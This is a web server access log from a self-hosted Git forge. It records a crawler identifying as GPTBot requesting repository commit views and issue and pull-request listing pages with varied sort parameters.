[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15665] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15662] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15668] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15664] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21827] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" +[17/Feb/2026:19:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" 